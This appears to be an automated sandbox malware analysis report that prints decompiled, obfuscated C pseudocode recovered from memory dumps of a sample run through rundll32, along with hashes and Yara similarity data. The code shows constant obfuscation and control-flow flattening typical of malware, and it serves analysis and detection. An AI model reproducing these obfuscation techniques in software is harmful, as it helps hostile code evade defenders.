                                                                                                                                    0x002d9e3d
                                                                                                                                    0x002d9e4a
                                                                                                                                    0x002d9e55

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: <~)$`/&$cA$m9
                                                                                                                                    • API String ID: 0-2671356241
                                                                                                                                    • Opcode ID: 0357c323211fbb2750b6ff63dd811012db8b592bb5a4c14c508bc9731e28ab86
                                                                                                                                    • Instruction ID: d25da1b1ef089132ec5729b49e4b050a5cfd40e0938d991f5338783c5d86e95b
                                                                                                                                    • Opcode Fuzzy Hash: 0357c323211fbb2750b6ff63dd811012db8b592bb5a4c14c508bc9731e28ab86
                                                                                                                                    • Instruction Fuzzy Hash: 135175710183029FC388CE21D49542BBBE2FFD8758F501E1EF5A692260C7B4CA998F93
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002C9B83 Relevance: 5.1, Strings: 4, Instructions: 109COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                    			E002C9B83(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				void* _v64;
				intOrPtr _v68;
				void* _t115;
				signed int _t130;
				signed int _t131;
				void* _t133;

				_push(_a16);
				_push(_a12);
				_v52 = 0x104;
				_push(_a8);
				_push(_a4);
				_push(0x104);
				_push(__ecx);
				E002D20B9(0x104);
				_v68 = 0x342964;
				asm("stosd");
				_t133 = 0;
				asm("stosd");
				asm("stosd");
				_v40 = 0xa3a3c;
				_v40 = _v40 + 0x2c25;
				_v40 = _v40 ^ 0x000a7661;
				_v16 = 0x75ee44;
				_t130 = 0x7a;
				_v16 = _v16 / _t130;
				_v16 = _v16 ^ 0xc9e42672;
				_v16 = _v16 ^ 0xc9e58a7e;
				_v8 = 0x386b92;
				_v8 = _v8 << 4;
				_v8 = _v8 | 0x0ec9a536;
				_v8 = _v8 >> 0xf;
				_v8 = _v8 ^ 0x000b4478;
				_v44 = 0xd66787;
				_v44 = _v44 >> 3;
				_v44 = _v44 ^ 0x001d593f;
				_v24 = 0x7c5a73;
				_v24 = _v24 | 0xae316990;
				_t131 = 0x19;
				_v24 = _v24 / _t131;
				_v24 = _v24 ^ 0x06f0967a;
				_v20 = 0x3dfd52;
				_v20 = _v20 >> 8;
				_v20 = _v20 * 0x24;
				_v20 = _v20 ^ 0x0009affd;
				_v12 = 0xf0c6a5;
				_v12 = _v12 + 0xffff2be4;
				_v12 = _v12 + 0x1686;
				_v12 = _v12 << 2;
				_v12 = _v12 ^ 0x03c3840c;
				_v48 = 0x30c967;
				_v48 = _v48 | 0xcae095b2;
				_v48 = _v48 ^ 0xcaf7f966;
				_v36 = 0xabcbdc;
				_v36 = _v36 + 0xfffff856;
				_v36 = _v36 | 0xb2b71321;
				_v36 = _v36 ^ 0xb2b3c312;
				_v32 = 0xda8dbe;
				_v32 = _v32 + 0xffff364b;
				_v32 = _v32 | 0x02598b37;
				_v32 = _v32 ^ 0x02d31c0a;
				_v28 = 0x528ee8;
				_v28 = _v28 * 0x12;
				_v28 = _v28 << 2;
				_v28 = _v28 ^ 0x17383776;
				_t115 = E002C91DD(__ecx, _v40, __ecx);
				_t132 = _t115;
				if(_t115 != 0) {
					_t133 = E002C76AA(_a12,  &_v52, _v44, _v24, __ecx, _v20, _t132, _v12);
					E002D1E67(_v48, _v36, _v32, _v28, _t132);
				}
				return _t133;
			}





















                                                                                                                                    0x002c9b8b
                                                                                                                                    0x002c9b93
                                                                                                                                    0x002c9b96
                                                                                                                                    0x002c9b99
                                                                                                                                    0x002c9b9c
                                                                                                                                    0x002c9b9f
                                                                                                                                    0x002c9ba0
                                                                                                                                    0x002c9ba1
                                                                                                                                    0x002c9ba6
                                                                                                                                    0x002c9bb4
                                                                                                                                    0x002c9bb5
                                                                                                                                    0x002c9bb9
                                                                                                                                    0x002c9bba
                                                                                                                                    0x002c9bbb
                                                                                                                                    0x002c9bc2
                                                                                                                                    0x002c9bc9
                                                                                                                                    0x002c9bd0
                                                                                                                                    0x002c9bda
                                                                                                                                    0x002c9bdf
                                                                                                                                    0x002c9be4
                                                                                                                                    0x002c9beb
                                                                                                                                    0x002c9bf2
                                                                                                                                    0x002c9bf9
                                                                                                                                    0x002c9bfd
                                                                                                                                    0x002c9c04
                                                                                                                                    0x002c9c08
                                                                                                                                    0x002c9c0f
                                                                                                                                    0x002c9c16
                                                                                                                                    0x002c9c1a
                                                                                                                                    0x002c9c21
                                                                                                                                    0x002c9c28
                                                                                                                                    0x002c9c32
                                                                                                                                    0x002c9c38
                                                                                                                                    0x002c9c3b
                                                                                                                                    0x002c9c42
                                                                                                                                    0x002c9c49
                                                                                                                                    0x002c9c52
                                                                                                                                    0x002c9c55
                                                                                                                                    0x002c9c5c
                                                                                                                                    0x002c9c63
                                                                                                                                    0x002c9c6a
                                                                                                                                    0x002c9c71
                                                                                                                                    0x002c9c75
                                                                                                                                    0x002c9c7c
                                                                                                                                    0x002c9c83
                                                                                                                                    0x002c9c8a
                                                                                                                                    0x002c9c91
                                                                                                                                    0x002c9c98
                                                                                                                                    0x002c9c9f
                                                                                                                                    0x002c9ca6
                                                                                                                                    0x002c9cad
                                                                                                                                    0x002c9cb4
                                                                                                                                    0x002c9cbb
                                                                                                                                    0x002c9cc2
                                                                                                                                    0x002c9cc9
                                                                                                                                    0x002c9cd4
                                                                                                                                    0x002c9cd7
                                                                                                                                    0x002c9cdb
                                                                                                                                    0x002c9ceb
                                                                                                                                    0x002c9cf3
                                                                                                                                    0x002c9cf7
                                                                                                                                    0x002c9d16
                                                                                                                                    0x002c9d21
                                                                                                                                    0x002c9d26
                                                                                                                                    0x002c9d30

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: Du$av$d)4$sZ|
                                                                                                                                    • API String ID: 0-269012183
                                                                                                                                    • Opcode ID: dfc967cf0c468e8d72dd3f4d8ef6424ad64969c011c2b846f478a6ab0dae1b6b
                                                                                                                                    • Instruction ID: d80c5bd3bcfd5ae228ac4c968ced1ad257daedf2d7e1df5ac21b077cfa88f58e
                                                                                                                                    • Opcode Fuzzy Hash: dfc967cf0c468e8d72dd3f4d8ef6424ad64969c011c2b846f478a6ab0dae1b6b
                                                                                                                                    • Instruction Fuzzy Hash: A95112B1D00209EBDF09DFE5C94A8EEBBB1FB48318F108159E412B6260D3B55A58DFA0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 10043730 Relevance: 4.5, APIs: 3, Instructions: 39threadCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetThreadLocale.KERNEL32 ref: 10043743
                                                                                                                                    • GetLocaleInfoA.KERNEL32(00000000,00001004,?,00000007), ref: 10043755
                                                                                                                                    • GetACP.KERNEL32 ref: 1004377E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Locale$InfoThread
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4232894706-0
                                                                                                                                    • Opcode ID: 138607bedea967b7fe84d9a3997690d852697f2840ddf7cd3550f999a21f7b57
                                                                                                                                    • Instruction ID: 788673dfdacf9fce6eb7172e6dd538a5e2a4211a9e61a4e82855ee0bc522c5dc
                                                                                                                                    • Opcode Fuzzy Hash: 138607bedea967b7fe84d9a3997690d852697f2840ddf7cd3550f999a21f7b57
                                                                                                                                    • Instruction Fuzzy Hash: 8AF0C871E04238ABE715DBA489955EFB7E4EB09A81B11816CD981E7251EA206D0487C9
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 10018C9A Relevance: 4.5, APIs: 3, Instructions: 37COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: fb0f3e1e5a18f2ff69a806334b974a9f52d4ac6ab5fd56aeff2c93c24eadb245
                                                                                                                                    • Instruction ID: 3e933570e0ddfcbf732aafa8bdad2c1db21bb76b11c706ff9f14b0ef8e609435
                                                                                                                                    • Opcode Fuzzy Hash: fb0f3e1e5a18f2ff69a806334b974a9f52d4ac6ab5fd56aeff2c93c24eadb245
                                                                                                                                    • Instruction Fuzzy Hash: 63F03731505119EBDF01DF70CD48AAE3FA9FB04284F008020FD09D9060EB31EB95EBA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002D0E53 Relevance: 4.1, Strings: 3, Instructions: 343COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 83%
                                                                                                                                    			E002D0E53(void* __ecx) {
				char _v520;
				char _v1040;
				char _v1560;
				char _v2080;
				char _v2600;
				signed int _v2604;
				signed int _v2608;
				signed int _v2612;
				signed int _v2616;
				signed int _v2620;
				signed int _v2624;
				signed int _v2628;
				signed int _v2632;
				signed int _v2636;
				signed int _v2640;
				signed int _v2644;
				signed int _v2648;
				signed int _v2652;
				signed int _v2656;
				signed int _v2660;
				signed int _v2664;
				signed int _v2668;
				signed int _v2672;
				signed int _v2676;
				signed int _v2680;
				signed int _v2684;
				signed int _v2688;
				signed int _v2692;
				signed int _v2696;
				signed int _v2700;
				signed int _v2704;
				signed int _v2708;
				signed int _v2712;
				signed int _v2716;
				signed int _v2720;
				signed int _v2724;
				signed int _v2728;
				signed int _v2732;
				signed int _v2736;
				signed int _v2740;
				signed int _v2744;
				signed int _v2748;
				signed int _v2752;
				signed int _v2756;
				signed int _v2760;
				signed int _v2764;
				signed int _v2768;
				signed int _v2772;
				signed int _t406;
				signed int _t426;
				signed int _t427;
				signed int _t428;
				signed int _t429;
				signed int _t430;
				signed int _t435;
				void* _t467;
				void* _t468;
				signed int* _t472;

				_t472 =  &_v2772;
				_v2700 = 0xd36ba7;
				_v2700 = _v2700 << 7;
				_v2700 = _v2700 ^ 0xaed70c65;
				_v2700 = _v2700 ^ 0xc762dfcc;
				_v2652 = 0x6f4609;
				_t9 =  &_v2652; // 0x6f4609
				_v2652 =  *_t9 * 0x1c;
				_t467 = __ecx;
				_v2652 = _v2652 ^ 0x0c23569d;
				_t468 = 0xea1969c;
				_v2608 = 0xb8394b;
				_v2608 = _v2608 + 0xaeb5;
				_v2608 = _v2608 ^ 0x00b390c3;
				_v2736 = 0x3d33f1;
				_v2736 = _v2736 + 0xffffd537;
				_v2736 = _v2736 + 0xffffb6ee;
				_v2736 = _v2736 + 0xbad8;
				_v2736 = _v2736 ^ 0x003e0409;
				_v2768 = 0xd1d4ce;
				_v2768 = _v2768 >> 0xc;
				_v2768 = _v2768 ^ 0xb5c37fe4;
				_v2768 = _v2768 + 0x4eb3;
				_v2768 = _v2768 ^ 0xb5c2c9c4;
				_v2760 = 0x157bbd;
				_v2760 = _v2760 ^ 0x6d7617e7;
				_v2760 = _v2760 ^ 0x1b56cd2f;
				_v2760 = _v2760 ^ 0xfb63426d;
				_v2760 = _v2760 ^ 0x8d577604;
				_v2604 = 0x1fac8b;
				_v2604 = _v2604 + 0x9962;
				_v2604 = _v2604 ^ 0x0029d956;
				_v2696 = 0x3d46b4;
				_v2696 = _v2696 | 0x3d7fd3ff;
				_v2696 = _v2696 ^ 0x3d7bd02d;
				_v2720 = 0xad1695;
				_t426 = 9;
				_v2720 = _v2720 * 0x4b;
				_v2720 = _v2720 >> 0x10;
				_v2720 = _v2720 << 0xe;
				_v2720 = _v2720 ^ 0x0cab1f79;
				_v2644 = 0xe14118;
				_v2644 = _v2644 ^ 0x82369820;
				_v2644 = _v2644 ^ 0x82de8a4e;
				_v2668 = 0x391c30;
				_v2668 = _v2668 >> 7;
				_v2668 = _v2668 + 0xffff3589;
				_v2668 = _v2668 ^ 0xfff6d862;
				_v2692 = 0x9dbc3;
				_v2692 = _v2692 << 8;
				_v2692 = _v2692 * 0x75;
				_v2692 = _v2692 ^ 0x81749ad9;
				_v2660 = 0x144a46;
				_v2660 = _v2660 >> 0xd;
				_v2660 = _v2660 ^ 0x0008b8c7;
				_v2752 = 0x703c03;
				_v2752 = _v2752 * 0x74;
				_v2752 = _v2752 ^ 0x2e54cb21;
				_v2752 = _v2752 | 0x6f17e683;
				_v2752 = _v2752 ^ 0x7f96e2f0;
				_v2676 = 0xa438e5;
				_v2676 = _v2676 / _t426;
				_v2676 = _v2676 + 0x92ff;
				_v2676 = _v2676 ^ 0x0015b827;
				_v2612 = 0x1c48b9;
				_t427 = 0x1a;
				_v2612 = _v2612 / _t427;
				_v2612 = _v2612 ^ 0x000154fb;
				_v2628 = 0x490198;
				_v2628 = _v2628 | 0x561f6486;
				_v2628 = _v2628 ^ 0x565ec1b9;
				_v2616 = 0xcec4ed;
				_t428 = 0x3d;
				_v2616 = _v2616 * 9;
				_v2616 = _v2616 ^ 0x074f393e;
				_v2636 = 0x4be85b;
				_v2636 = _v2636 >> 1;
				_v2636 = _v2636 ^ 0x002afd34;
				_v2728 = 0xca47ed;
				_v2728 = _v2728 << 1;
				_v2728 = _v2728 / _t428;
				_v2728 = _v2728 >> 3;
				_v2728 = _v2728 ^ 0x00084593;
				_v2620 = 0x793301;
				_v2620 = _v2620 | 0xccc0d5da;
				_v2620 = _v2620 ^ 0xccf56683;
				_v2684 = 0xd6c9e7;
				_v2684 = _v2684 >> 8;
				_v2684 = _v2684 + 0x30fc;
				_v2684 = _v2684 ^ 0x000dbf27;
				_v2656 = 0x6cf887;
				_v2656 = _v2656 | 0x54469415;
				_v2656 = _v2656 ^ 0x5469dd96;
				_v2712 = 0x1ba43e;
				_v2712 = _v2712 + 0xffff54b6;
				_v2712 = _v2712 >> 0x10;
				_v2712 = _v2712 ^ 0x536d0b9d;
				_v2712 = _v2712 ^ 0x5368fd88;
				_v2744 = 0x7fa81e;
				_v2744 = _v2744 + 0x45dd;
				_v2744 = _v2744 | 0xcc5c3b14;
				_t429 = 0x76;
				_v2744 = _v2744 * 0x48;
				_v2744 = _v2744 ^ 0x83f6fb81;
				_v2704 = 0x73cce1;
				_v2704 = _v2704 >> 6;
				_v2704 = _v2704 | 0x0e0742c3;
				_v2704 = _v2704 ^ 0x0e0521c8;
				_v2764 = 0x3737a7;
				_v2764 = _v2764 >> 0xb;
				_v2764 = _v2764 << 3;
				_v2764 = _v2764 + 0x14ac;
				_v2764 = _v2764 ^ 0x0004654a;
				_v2772 = 0xaeb57f;
				_v2772 = _v2772 / _t429;
				_v2772 = _v2772 << 0xf;
				_t430 = 0x37;
				_v2772 = _v2772 / _t430;
				_v2772 = _v2772 ^ 0x037ee988;
				_v2648 = 0x954498;
				_t431 = 0x4b;
				_v2648 = _v2648 / _t431;
				_v2648 = _v2648 ^ 0x00054dec;
				_v2640 = 0x8be41e;
				_v2640 = _v2640 >> 0xd;
				_v2640 = _v2640 ^ 0x00089615;
				_v2748 = 0xfabe1b;
				_v2748 = _v2748 ^ 0xff42a680;
				_v2748 = _v2748 + 0xffff8ee7;
				_v2748 = _v2748 + 0x1c5a;
				_v2748 = _v2748 ^ 0xffbaa703;
				_v2756 = 0x33a01d;
				_v2756 = _v2756 * 0x6f;
				_v2756 = _v2756 << 4;
				_v2756 = _v2756 >> 4;
				_v2756 = _v2756 ^ 0x066d94da;
				_v2672 = 0x7cb69f;
				_v2672 = _v2672 << 4;
				_v2672 = _v2672 * 0x4a;
				_v2672 = _v2672 ^ 0x40c5c2d0;
				_v2680 = 0xc0e1f8;
				_v2680 = _v2680 << 1;
				_v2680 = _v2680 | 0xa5ca1830;
				_v2680 = _v2680 ^ 0xa5ca6401;
				_v2732 = 0xd52773;
				_v2732 = _v2732 ^ 0x8b84e9f5;
				_v2732 = _v2732 + 0xffffa58a;
				_v2732 = _v2732 >> 1;
				_v2732 = _v2732 ^ 0x45a69f9f;
				_v2740 = 0x525c84;
				_v2740 = _v2740 * 0x45;
				_v2740 = _v2740 << 0xd;
				_v2740 = _v2740 + 0xffffe485;
				_v2740 = _v2740 ^ 0x5df42895;
				_v2688 = 0x8afd1b;
				_v2688 = _v2688 >> 0xa;
				_v2688 = _v2688 * 0x44;
				_v2688 = _v2688 ^ 0x000c822b;
				_v2632 = 0xb6ec99;
				_v2632 = _v2632 + 0xffff2a9a;
				_v2632 = _v2632 ^ 0x00b1db1a;
				_v2664 = 0xfa37e2;
				_v2664 = _v2664 * 0x4c;
				_v2664 = _v2664 + 0x9251;
				_v2664 = _v2664 ^ 0x4a4e0c53;
				_v2708 = 0xf9311d;
				_v2708 = _v2708 >> 2;
				_t406 = _v2708 * 0x30;
				_v2708 = _t406;
				_v2708 = _v2708 + 0xffffde46;
				_v2708 = _v2708 ^ 0x0bad021b;
				_v2624 = 0x51d14;
				_v2624 = _v2624 | 0x271919e8;
				_v2624 = _v2624 ^ 0x2716653c;
				_v2716 = 0x708eea;
				_v2716 = _v2716 + 0xfffff8d8;
				_v2716 = _v2716 | 0x4ca3cf3c;
				_v2716 = _v2716 ^ 0x396f5f4d;
				_v2716 = _v2716 ^ 0x7599e4cd;
				_v2724 = 0x3acc77;
				_v2724 = _v2724 + 0x56d;
				_v2724 = _v2724 + 0xb0bb;
				_v2724 = _v2724 + 0xffffce89;
				_v2724 = _v2724 ^ 0x003c4612;
				while(_t468 != 0x5de06da) {
					if(_t468 == 0xea1969c) {
						_t468 = 0xfa9128f;
						continue;
					} else {
						_t480 = _t468 - 0xfa9128f;
						if(_t468 != 0xfa9128f) {
							L8:
							__eflags = _t468 - 0xa8e801c;
							if(__eflags != 0) {
								continue;
							}
						} else {
							E002DDA22(_v2652, _v2608, _t480, _v2736,  &_v2600, _t431, _v2768);
							 *((short*)(E002CB6CF( &_v2600, _v2760, _v2604, _v2696))) = 0;
							E002C8969(_v2720,  &_v1560, _t480, _v2644, _v2668);
							_push(_v2752);
							_push(_v2660);
							E002C47CE( &_v2600, _v2676, _v2692, _v2612, _v2628, E002DDCF7(_v2692, 0x2c1308, _t480),  &_v1560, _v2616, _v2636);
							E002CA8B0(_v2728, _t419, _v2620);
							_t431 = _v2684;
							_t406 = E002CEA99(_v2684, _t467, _v2656, _v2712,  &_v2080, _v2744);
							_t472 =  &(_t472[0x17]);
							if(_t406 != 0) {
								_t468 = 0x5de06da;
								continue;
							}
						}
					}
					return _t406;
				}
				_push(_v2648);
				_push(_v2700);
				_push(_v2772);
				_push( &_v1040);
				E002D46BB(_v2704, _v2764);
				_push(_v2756);
				_push(_v2748);
				E002C47CE( &_v1040, _v2672, _v2640, _v2680, _v2732, E002DDCF7(_v2640, 0x2c13b8, __eflags),  &_v2080, _v2740, _v2688);
				_t435 = _v2632;
				E002CA8B0(_t435, _t409, _v2664);
				__eflags = 0;
				_push(_v2724);
				_push(0);
				_push(_t435);
				_push(0);
				_push(0);
				_push(_v2716);
				_t431 = _v2708;
				_push( &_v520);
				_t406 = E002CAB87(_v2708, _v2624, 0);
				_t472 = _t472 - 0xc + 0x64;
				_t468 = 0xa8e801c;
				goto L8;
			}





























































                                                                                                                                    0x002d0e53
                                                                                                                                    0x002d0e59
                                                                                                                                    0x002d0e63
                                                                                                                                    0x002d0e68
                                                                                                                                    0x002d0e70
                                                                                                                                    0x002d0e78
                                                                                                                                    0x002d0e80
                                                                                                                                    0x002d0e89
                                                                                                                                    0x002d0e90
                                                                                                                                    0x002d0e92
                                                                                                                                    0x002d0e9d
                                                                                                                                    0x002d0ea2
                                                                                                                                    0x002d0ead
                                                                                                                                    0x002d0eb8
                                                                                                                                    0x002d0ec3
                                                                                                                                    0x002d0ecb
                                                                                                                                    0x002d0ed3
                                                                                                                                    0x002d0edb
                                                                                                                                    0x002d0ee3
                                                                                                                                    0x002d0eeb
                                                                                                                                    0x002d0ef3
                                                                                                                                    0x002d0ef8
                                                                                                                                    0x002d0f00
                                                                                                                                    0x002d0f08
                                                                                                                                    0x002d0f10
                                                                                                                                    0x002d0f18
                                                                                                                                    0x002d0f20
                                                                                                                                    0x002d0f28
                                                                                                                                    0x002d0f30
                                                                                                                                    0x002d0f38
                                                                                                                                    0x002d0f43
                                                                                                                                    0x002d0f4e
                                                                                                                                    0x002d0f59
                                                                                                                                    0x002d0f61
                                                                                                                                    0x002d0f69
                                                                                                                                    0x002d0f71
                                                                                                                                    0x002d0f80
                                                                                                                                    0x002d0f83
                                                                                                                                    0x002d0f87
                                                                                                                                    0x002d0f8c
                                                                                                                                    0x002d0f91
                                                                                                                                    0x002d0f99
                                                                                                                                    0x002d0fa4
                                                                                                                                    0x002d0faf
                                                                                                                                    0x002d0fba
                                                                                                                                    0x002d0fc2
                                                                                                                                    0x002d0fc7
                                                                                                                                    0x002d0fcf
                                                                                                                                    0x002d0fd7
                                                                                                                                    0x002d0fdf
                                                                                                                                    0x002d0fe9
                                                                                                                                    0x002d0fed
                                                                                                                                    0x002d0ff5
                                                                                                                                    0x002d1000
                                                                                                                                    0x002d1008
                                                                                                                                    0x002d1013
                                                                                                                                    0x002d1020
                                                                                                                                    0x002d1024
                                                                                                                                    0x002d102c
                                                                                                                                    0x002d1034
                                                                                                                                    0x002d103c
                                                                                                                                    0x002d104c
                                                                                                                                    0x002d1050
                                                                                                                                    0x002d1058
                                                                                                                                    0x002d1060
                                                                                                                                    0x002d1072
                                                                                                                                    0x002d1075
                                                                                                                                    0x002d107c
                                                                                                                                    0x002d1089
                                                                                                                                    0x002d1094
                                                                                                                                    0x002d109f
                                                                                                                                    0x002d10aa
                                                                                                                                    0x002d10bf
                                                                                                                                    0x002d10c2
                                                                                                                                    0x002d10c9
                                                                                                                                    0x002d10d4
                                                                                                                                    0x002d10df
                                                                                                                                    0x002d10e6
                                                                                                                                    0x002d10f1
                                                                                                                                    0x002d10f9
                                                                                                                                    0x002d1105
                                                                                                                                    0x002d1109
                                                                                                                                    0x002d110e
                                                                                                                                    0x002d1116
                                                                                                                                    0x002d1121
                                                                                                                                    0x002d112c
                                                                                                                                    0x002d1137
                                                                                                                                    0x002d113f
                                                                                                                                    0x002d1144
                                                                                                                                    0x002d114c
                                                                                                                                    0x002d1154
                                                                                                                                    0x002d115f
                                                                                                                                    0x002d116a
                                                                                                                                    0x002d1175
                                                                                                                                    0x002d117d
                                                                                                                                    0x002d1185
                                                                                                                                    0x002d118a
                                                                                                                                    0x002d1192
                                                                                                                                    0x002d119a
                                                                                                                                    0x002d11a2
                                                                                                                                    0x002d11aa
                                                                                                                                    0x002d11b7
                                                                                                                                    0x002d11ba
                                                                                                                                    0x002d11be
                                                                                                                                    0x002d11c6
                                                                                                                                    0x002d11ce
                                                                                                                                    0x002d11d3
                                                                                                                                    0x002d11db
                                                                                                                                    0x002d11e3
                                                                                                                                    0x002d11eb
                                                                                                                                    0x002d11f0
                                                                                                                                    0x002d11f5
                                                                                                                                    0x002d11fd
                                                                                                                                    0x002d1205
                                                                                                                                    0x002d1215
                                                                                                                                    0x002d1219
                                                                                                                                    0x002d1222
                                                                                                                                    0x002d1227
                                                                                                                                    0x002d122d
                                                                                                                                    0x002d1235
                                                                                                                                    0x002d1247
                                                                                                                                    0x002d124a
                                                                                                                                    0x002d1251
                                                                                                                                    0x002d125c
                                                                                                                                    0x002d1267
                                                                                                                                    0x002d126f
                                                                                                                                    0x002d127a
                                                                                                                                    0x002d1282
                                                                                                                                    0x002d128a
                                                                                                                                    0x002d1292
                                                                                                                                    0x002d129a
                                                                                                                                    0x002d12a7
                                                                                                                                    0x002d12b9
                                                                                                                                    0x002d12bd
                                                                                                                                    0x002d12c2
                                                                                                                                    0x002d12c7
                                                                                                                                    0x002d12cf
                                                                                                                                    0x002d12d7
                                                                                                                                    0x002d12e1
                                                                                                                                    0x002d12e5
                                                                                                                                    0x002d12ed
                                                                                                                                    0x002d12f5
                                                                                                                                    0x002d12f9
                                                                                                                                    0x002d1301
                                                                                                                                    0x002d1309
                                                                                                                                    0x002d1311
                                                                                                                                    0x002d1319
                                                                                                                                    0x002d1321
                                                                                                                                    0x002d1325
                                                                                                                                    0x002d132d
                                                                                                                                    0x002d133a
                                                                                                                                    0x002d133e
                                                                                                                                    0x002d1343
                                                                                                                                    0x002d134b
                                                                                                                                    0x002d1353
                                                                                                                                    0x002d135b
                                                                                                                                    0x002d1365
                                                                                                                                    0x002d1369
                                                                                                                                    0x002d1371
                                                                                                                                    0x002d137c
                                                                                                                                    0x002d1387
                                                                                                                                    0x002d1392
                                                                                                                                    0x002d139f
                                                                                                                                    0x002d13a3
                                                                                                                                    0x002d13ab
                                                                                                                                    0x002d13b3
                                                                                                                                    0x002d13bb
                                                                                                                                    0x002d13c0
                                                                                                                                    0x002d13c5
                                                                                                                                    0x002d13c9
                                                                                                                                    0x002d13d1
                                                                                                                                    0x002d13d9
                                                                                                                                    0x002d13e4
                                                                                                                                    0x002d13ef
                                                                                                                                    0x002d13fa
                                                                                                                                    0x002d1402
                                                                                                                                    0x002d140a
                                                                                                                                    0x002d1412
                                                                                                                                    0x002d141a
                                                                                                                                    0x002d1422
                                                                                                                                    0x002d142a
                                                                                                                                    0x002d1432
                                                                                                                                    0x002d143a
                                                                                                                                    0x002d1442
                                                                                                                                    0x002d144a
                                                                                                                                    0x002d1458
                                                                                                                                    0x002d1572
                                                                                                                                    0x00000000
                                                                                                                                    0x002d145e
                                                                                                                                    0x002d145e
                                                                                                                                    0x002d1460
                                                                                                                                    0x002d163b
                                                                                                                                    0x002d163b
                                                                                                                                    0x002d1641
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002d1466
                                                                                                                                    0x002d1485
                                                                                                                                    0x002d14bc
                                                                                                                                    0x002d14c3
                                                                                                                                    0x002d14c8
                                                                                                                                    0x002d14d1
                                                                                                                                    0x002d1524
                                                                                                                                    0x002d1536
                                                                                                                                    0x002d1554
                                                                                                                                    0x002d155b
                                                                                                                                    0x002d1560
                                                                                                                                    0x002d1565
                                                                                                                                    0x002d156b
                                                                                                                                    0x00000000
                                                                                                                                    0x002d156b
                                                                                                                                    0x002d1565
                                                                                                                                    0x002d1460
                                                                                                                                    0x002d1651
                                                                                                                                    0x002d1651
                                                                                                                                    0x002d1579
                                                                                                                                    0x002d1587
                                                                                                                                    0x002d158b
                                                                                                                                    0x002d159a
                                                                                                                                    0x002d159b
                                                                                                                                    0x002d15a0
                                                                                                                                    0x002d15a9
                                                                                                                                    0x002d15f0
                                                                                                                                    0x002d15fc
                                                                                                                                    0x002d1605
                                                                                                                                    0x002d160d
